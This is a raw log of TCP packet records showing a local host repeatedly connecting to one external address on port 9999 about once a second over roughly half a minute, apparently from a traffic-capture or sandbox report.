Oct 8, 2024 04:19:54.926595926 CEST	54006	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:54.926753044 CEST	54007	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:54.945856094 CEST	9999	54006	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:54.945899963 CEST	9999	54006	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:54.945914984 CEST	9999	54007	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:54.945969105 CEST	54006	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:54.946041107 CEST	54007	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:54.946335077 CEST	54007	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:54.951205015 CEST	9999	54007	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:55.886111021 CEST	9999	54007	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:55.886137962 CEST	9999	54007	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:55.886326075 CEST	54007	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:55.886480093 CEST	54007	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:55.891248941 CEST	9999	54007	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:55.997373104 CEST	54008	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:56.002794027 CEST	9999	54008	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:56.002875090 CEST	54008	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:56.002990961 CEST	54008	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:56.008243084 CEST	9999	54008	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:56.917774916 CEST	9999	54008	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:56.917891026 CEST	9999	54008	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:56.918011904 CEST	54008	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:56.918134928 CEST	54008	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:56.922918081 CEST	9999	54008	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:57.028704882 CEST	54009	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:57.033719063 CEST	9999	54009	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:57.033823967 CEST	54009	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:57.034018040 CEST	54009	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:57.038974047 CEST	9999	54009	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:57.940593958 CEST	9999	54009	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:57.940618992 CEST	9999	54009	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:57.940654039 CEST	54009	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:57.940715075 CEST	54009	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:57.942126989 CEST	54009	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:57.947283030 CEST	9999	54009	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:58.045008898 CEST	54011	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:58.049860954 CEST	9999	54011	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:58.050000906 CEST	54011	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:58.050271988 CEST	54011	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:58.055054903 CEST	9999	54011	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:58.942904949 CEST	9999	54011	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:58.942961931 CEST	9999	54011	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:58.943229914 CEST	54011	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:58.943229914 CEST	54011	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:58.948575974 CEST	9999	54011	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:59.044439077 CEST	54012	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:59.049292088 CEST	9999	54012	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:59.049403906 CEST	54012	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:59.049556017 CEST	54012	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:59.054506063 CEST	9999	54012	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:59.950898886 CEST	9999	54012	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:59.951013088 CEST	54012	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:59.951041937 CEST	9999	54012	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:59.951092958 CEST	54012	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:00.059638023 CEST	54012	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:00.059891939 CEST	54022	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:00.070112944 CEST	9999	54012	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:00.070147038 CEST	9999	54022	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:00.070296049 CEST	54022	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:00.070600033 CEST	54022	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:00.075551033 CEST	9999	54022	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:01.004671097 CEST	9999	54022	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:01.004837036 CEST	9999	54022	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:01.004858971 CEST	54022	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:01.004949093 CEST	54022	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:01.005098104 CEST	54022	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:01.009941101 CEST	9999	54022	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:01.106837034 CEST	54029	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:01.112029076 CEST	9999	54029	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:01.112099886 CEST	54029	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:01.112235069 CEST	54029	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:01.117645979 CEST	9999	54029	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:02.013458967 CEST	9999	54029	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:02.013508081 CEST	9999	54029	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:02.013597012 CEST	54029	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:02.013760090 CEST	54029	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:02.014076948 CEST	54029	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:02.019076109 CEST	9999	54029	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:02.122883081 CEST	54035	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:02.128150940 CEST	9999	54035	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:02.128597021 CEST	54035	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:02.128597021 CEST	54035	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:02.133987904 CEST	9999	54035	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:03.043184996 CEST	9999	54035	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:03.043230057 CEST	9999	54035	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:03.043271065 CEST	54035	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:03.043271065 CEST	54035	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:03.043464899 CEST	54035	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:03.048333883 CEST	9999	54035	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:03.170509100 CEST	54046	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:03.175426960 CEST	9999	54046	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:03.175514936 CEST	54046	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:03.181911945 CEST	54046	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:03.186752081 CEST	9999	54046	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:04.062051058 CEST	9999	54046	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:04.062119961 CEST	54046	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:04.062179089 CEST	9999	54046	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:04.062231064 CEST	54046	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:04.062263012 CEST	54046	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:04.067106009 CEST	9999	54046	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:04.169456959 CEST	54052	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:04.175322056 CEST	9999	54052	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:04.175789118 CEST	54052	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:04.175789118 CEST	54052	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:04.181519032 CEST	9999	54052	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:05.105377913 CEST	9999	54052	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:05.105448961 CEST	9999	54052	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:05.105700016 CEST	54052	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:05.105700016 CEST	54052	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:05.105968952 CEST	54052	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:05.110855103 CEST	9999	54052	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:05.216562986 CEST	54058	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:05.221611977 CEST	9999	54058	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:05.221697092 CEST	54058	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:05.221843004 CEST	54058	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:05.226696968 CEST	9999	54058	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:06.144515038 CEST	9999	54058	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:06.144578934 CEST	9999	54058	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:06.144594908 CEST	54058	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:06.144644976 CEST	54058	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:06.144714117 CEST	54058	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:06.150057077 CEST	9999	54058	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:06.247559071 CEST	54067	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:06.252748013 CEST	9999	54067	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:06.252829075 CEST	54067	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:06.252935886 CEST	54067	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:06.259959936 CEST	9999	54067	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:07.187200069 CEST	9999	54067	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:07.187242031 CEST	9999	54067	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:07.187407970 CEST	54067	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:07.187408924 CEST	54067	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:07.191890955 CEST	54067	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:07.197114944 CEST	9999	54067	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:07.294554949 CEST	54075	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:07.299633026 CEST	9999	54075	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:07.299722910 CEST	54075	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:07.299865961 CEST	54075	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:07.304740906 CEST	9999	54075	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:08.438564062 CEST	9999	54075	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:08.438601971 CEST	9999	54075	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:08.438627958 CEST	9999	54075	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:08.438709974 CEST	54075	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:08.438776016 CEST	54075	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:08.438889980 CEST	54075	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:08.447855949 CEST	9999	54075	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:08.544342995 CEST	54076	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:08.549304008 CEST	9999	54076	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:08.549398899 CEST	54076	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:08.550318003 CEST	54076	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:08.555176020 CEST	9999	54076	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:09.488781929 CEST	9999	54076	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:09.488923073 CEST	54076	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:09.489595890 CEST	9999	54076	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:09.489660978 CEST	54076	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:09.595941067 CEST	54076	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:09.596581936 CEST	54087	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:09.601222992 CEST	9999	54076	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:09.601500034 CEST	9999	54087	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:09.601563931 CEST	54087	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:09.601660967 CEST	54087	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:09.606662989 CEST	9999	54087	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:10.501688004 CEST	9999	54087	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:10.501748085 CEST	54087	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:10.501758099 CEST	9999	54087	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:10.501802921 CEST	54087	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:10.502434969 CEST	54087	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:10.507253885 CEST	9999	54087	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:10.614077091 CEST	54093	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:10.619544029 CEST	9999	54093	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:10.619637012 CEST	54093	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:10.619745016 CEST	54093	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:10.624800920 CEST	9999	54093	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:11.547317982 CEST	9999	54093	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:11.547363997 CEST	9999	54093	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:11.547389984 CEST	54093	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:11.547421932 CEST	54093	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:11.547528982 CEST	54093	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:11.552365065 CEST	9999	54093	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:11.660830975 CEST	54099	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:11.665772915 CEST	9999	54099	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:11.665971994 CEST	54099	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:11.666063070 CEST	54099	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:11.671185970 CEST	9999	54099	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:12.550916910 CEST	9999	54099	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:12.550985098 CEST	54099	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:12.550987959 CEST	9999	54099	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:12.551033974 CEST	54099	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:12.551177979 CEST	54099	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:12.555984020 CEST	9999	54099	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:12.654967070 CEST	54110	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:12.659913063 CEST	9999	54110	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:12.662935972 CEST	54110	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:12.663024902 CEST	54110	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:12.668198109 CEST	9999	54110	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:13.596189976 CEST	9999	54110	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:13.596272945 CEST	9999	54110	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:13.596334934 CEST	54110	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:13.596334934 CEST	54110	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:13.596503019 CEST	54110	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:13.601557016 CEST	9999	54110	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:13.722942114 CEST	54116	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:13.727818966 CEST	9999	54116	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:13.727988958 CEST	54116	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:13.728816032 CEST	54116	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:13.733612061 CEST	9999	54116	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:14.642086983 CEST	9999	54116	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:14.642143011 CEST	54116	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:14.642257929 CEST	9999	54116	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:14.642304897 CEST	54116	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:14.748143911 CEST	54116	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:14.748524904 CEST	54123	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:14.753194094 CEST	9999	54116	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:14.753659964 CEST	9999	54123	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:14.753772974 CEST	54123	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:14.753990889 CEST	54123	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:14.758893013 CEST	9999	54123	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:15.650712013 CEST	9999	54123	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:15.650787115 CEST	54123	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:15.651035070 CEST	9999	54123	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:15.651093006 CEST	54123	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:15.762876034 CEST	54123	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:15.763098955 CEST	54132	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:15.767760992 CEST	9999	54123	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:15.767910004 CEST	9999	54132	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:15.767976999 CEST	54132	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:15.768197060 CEST	54132	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:15.773036003 CEST	9999	54132	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:16.696935892 CEST	9999	54132	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:16.696980953 CEST	9999	54132	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:16.697041035 CEST	54132	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:16.697072983 CEST	54132	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:16.697139025 CEST	54132	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:16.702052116 CEST	9999	54132	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:16.811885118 CEST	54137	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:16.817404032 CEST	9999	54137	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:16.817553043 CEST	54137	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:16.817748070 CEST	54137	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:16.822712898 CEST	9999	54137	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:17.715440989 CEST	9999	54137	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:17.715528011 CEST	54137	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:17.715534925 CEST	9999	54137	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:17.715605974 CEST	54137	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:17.715842962 CEST	54137	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:17.720630884 CEST	9999	54137	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:17.826009989 CEST	54141	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:17.834530115 CEST	9999	54141	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:17.834760904 CEST	54141	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:17.834855080 CEST	54141	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:17.839736938 CEST	9999	54141	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:18.743299961 CEST	9999	54141	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:18.743352890 CEST	9999	54141	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:18.743829966 CEST	54141	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:18.743961096 CEST	54141	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:18.749118090 CEST	9999	54141	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:18.857060909 CEST	54147	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:18.862030983 CEST	9999	54147	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:18.862138033 CEST	54147	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:18.862215042 CEST	54147	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:18.867161989 CEST	9999	54147	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:19.807754040 CEST	9999	54147	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:19.807838917 CEST	9999	54147	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:19.807840109 CEST	54147	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:19.807887077 CEST	54147	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:19.807974100 CEST	54147	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:19.812777996 CEST	9999	54147	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:19.919454098 CEST	54151	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:19.924400091 CEST	9999	54151	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:19.924482107 CEST	54151	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:19.924626112 CEST	54151	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:19.930979967 CEST	9999	54151	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:20.836843967 CEST	9999	54151	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:20.837022066 CEST	54151	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:20.837074041 CEST	9999	54151	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:20.837588072 CEST	54151	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:20.837636948 CEST	54151	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:20.842431068 CEST	9999	54151	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:20.950684071 CEST	54157	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:20.955816984 CEST	9999	54157	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:20.955900908 CEST	54157	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:20.955988884 CEST	54157	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:20.960856915 CEST	9999	54157	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:21.896529913 CEST	9999	54157	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:21.896564007 CEST	9999	54157	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:21.896605968 CEST	54157	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:21.896658897 CEST	54157	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:21.937309027 CEST	54157	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:21.942056894 CEST	9999	54157	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:22.044646025 CEST	54167	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:22.049619913 CEST	9999	54167	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:22.049699068 CEST	54167	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:22.049834013 CEST	54167	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:22.054809093 CEST	9999	54167	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:22.942291975 CEST	9999	54167	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:22.942415953 CEST	9999	54167	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:22.942606926 CEST	54167	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:22.942608118 CEST	54167	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:22.942608118 CEST	54167	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:22.947602987 CEST	9999	54167	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:23.046387911 CEST	54174	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:23.051588058 CEST	9999	54174	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:23.051897049 CEST	54174	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:23.051986933 CEST	54174	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:23.057070971 CEST	9999	54174	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:23.970520020 CEST	9999	54174	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:23.970648050 CEST	9999	54174	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:23.970751047 CEST	54174	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:23.970751047 CEST	54174	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:24.095766068 CEST	54174	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:24.096116066 CEST	54180	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:24.101353884 CEST	9999	54174	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:24.101694107 CEST	9999	54180	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:24.101911068 CEST	54180	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:24.102310896 CEST	54180	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:24.107871056 CEST	9999	54180	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:25.001955986 CEST	9999	54180	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:25.001976967 CEST	9999	54180	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:25.002017975 CEST	54180	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:25.002063036 CEST	54180	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:25.002162933 CEST	54180	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:25.006959915 CEST	9999	54180	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:25.108441114 CEST	54190	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:25.113334894 CEST	9999	54190	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:25.113665104 CEST	54190	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:25.114722967 CEST	54190	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:25.119493961 CEST	9999	54190	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:26.025738955 CEST	9999	54190	47.239.242.141	192.168.2.4
